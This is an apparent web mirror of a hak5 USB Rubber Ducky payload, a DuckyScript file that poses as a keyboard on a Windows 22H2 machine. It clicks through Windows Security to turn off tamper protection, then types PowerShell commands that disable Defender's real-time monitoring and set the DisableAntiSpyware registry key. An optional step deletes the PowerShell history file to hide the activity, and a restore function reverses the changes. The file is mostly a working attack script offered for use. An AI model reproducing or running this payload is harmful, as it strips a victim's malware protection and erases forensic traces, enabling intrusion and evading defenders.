Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt
2971 views
1
REM Disable Windows Defender

2
REM VERSION 1.0

3
REM Author HackingMark

4
REM Disables Tampering Protection and Kills Windows Defender on Win 22H2

5
REM Tested on German Computers

6
REM Uncomment DISABLE_WINDOWS_DEFENDER() or RESTORE() at the end to use it within the Extension or call it later in your Payload.

7
          

8
          

9
REM Attack Commands for disabling RTP and Defender with (T)/without(F) clearing or (R) Restore

10
DEFINE ATTACK_F Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; exit;

11
DEFINE ATTACK_T Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;

12
DEFINE ATTACK_R Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; exit;

13
DEFINE ATTACK_RC Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;

14


15
REM Change the Term for "Windows-Securitycenter" for your Target Language here:

16
DEFINE TERM_WIN_SEC_CENTER Windows-Sicherheit

17
REM CLEAN = TRUE deletes PS History, set to FALSE to run Payload without deleting History

18
VAR $clean = TRUE

19


20
ATTACKMODE HID

21
DELAY 2000

22
FUNCTION DISABLE_WINDOWS_DEFENDER()

23
    GUI s

24
    DELAY 500

25
    STRINGLN TERM_WIN_SEC_CENTER

26
    DELAY 500

27
    ENTER

28
    TAB

29
    TAB

30
    TAB

31
    TAB

32
    ENTER

33
    DELAY 500

34
    TAB

35
    TAB

36
    TAB

37
    TAB

38
    SPACE

39
    DELAY 500

40
    ALT j

41
    DELAY 500

42
    ALT F4

43
    DELAY 1500

44
    GUI x

45
    DELAY 100

46
    STRING a

47
    DELAY 500

48
    ALT j

49
    DELAY 500

50
    IF ($clean == TRUE) THEN

51
     STRINGLN ATTACK_T

52
    ELSE 

53
     STRINGLN ATTACK_F

54
    END_IF

55


56
END_FUNCTION

57


58
FUNCTION RESTORE()

59
    GUI x

60
    DELAY 100

61
    STRING a

62
    DELAY 500

63
    ALT j

64
    DELAY 500

65
    IF ($clean == TRUE) THEN

66
     STRINGLN ATTACK_RC

67
    ELSE 

68
     STRINGLN ATTACK_R

69
    END_IF

70
END_FUNCTION

71


72
REM Uncomment the Mode you want to use:

73
REM DISABLE_WINDOWS_DEFENDER()

74
REM RESTORE()

75


76


77


78